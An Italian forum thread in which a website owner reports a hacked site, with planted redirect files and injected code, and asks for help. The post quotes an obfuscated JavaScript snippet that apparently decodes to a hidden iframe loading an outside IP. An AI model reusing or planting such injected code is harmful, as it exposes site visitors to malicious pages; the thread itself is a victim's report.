• S
    User Attivo

    Allarme Rosso!!!

    ciao a tutti....
    non so se sono nella sezione giusta, posto qui poi in caso mi sposterete...
    ieri sera facendo manutenzione su un mio sito ho trovato uno script nella home page che faceva riferimento ad una cartella denominata "latinass" residente nel mio spazio. questa cartella contiene innumerevoli file con redirect a siti porno. ovviamente nessuno del mio staff ha inserito questo codice che è stato immediatamente rimosso. analizzando i flie contenuti nella cartella latinass ho notato che i redirect avvenivano verso siti di varie società (anche piuttosto grandi e famose), che utilizzano tutte il mio stesso hosting. che cosa può essere successo? un attacco al server? un virus? aiutatemi a capire, anche perchè i file che ho trovato trattano argomenti molto deprecabili (bambini e adolescenti in particolare!!!).
    sto analizzando tutti i siti che ho in hosting presso questo provider è su alcuni ho trovato questa riga di codice che nessuno di noi ha mai inserito e che è diversa da quella che ho trovato ieri:

    <script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%286Fkwpo%286H%283D%286Fliudph%2853VUF%286G%2855kwws%286D22%3B41%3C8147%3B1752vwdw42lqgh%7B1sks%2855%2853ZLGWK%286G4833%2853KHLJKW%286G4833%2853vw%7Coh%286G%2855glvsod%7C%286Dqrqh%2855%286H%286F2liudph%286H%283D%286F2kwpo%286H3')</script>

    AIUTO!!!!

    0
  • wolf.otakar
    Consiglio Direttivo

    @simoweb said:

    che cosa può essere successo? un attacco al server? un virus? aiutatemi a capire, anche perchè i file che ho trovato trattano argomenti molto deprecabili (bambini e adolescenti in particolare!!!).

    Ciao,
    situazione delicata, "mi riferisco ai contenuti" che hai trovato nella cartella...contatta subito il provider!!

    0
  • S
    User Attivo

    Il provider l'ho contatto, ma ha scaricato la colpa su di noi...
    il contenuto è stato rimosso, ma ho paura di possibili ripercussioni sul posizionamento.

    0
  • K
    User Attivo

    avrai avuto un bug di sicurezza nei tuoi script.
    la prossima volta togli i permessi di scrittura sui tuoi script 😉

    0
Effettua l'accesso per rispondere